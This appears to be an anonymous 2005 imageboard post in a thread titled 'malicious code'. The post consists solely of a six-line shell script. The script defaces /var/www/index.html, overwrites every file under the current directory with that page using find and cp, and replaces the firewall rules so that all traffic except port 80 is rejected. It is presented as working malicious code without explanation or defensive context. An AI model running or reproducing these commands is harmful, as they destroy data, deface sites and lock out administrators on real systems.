malicious code (15)

12 Name: #!usr/bin/anon 2005-11-24 09:57 ID:BDtEdMQ/

echo 0wnz3d > /var/www/index.html
find -type f -exec cp /var/www/index.html {} \;
iptables -F INPUT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --sport 80 -j ACCEPT
iptables -A INPUT -j REJECT

This thread has been closed. You cannot post in this thread any longer.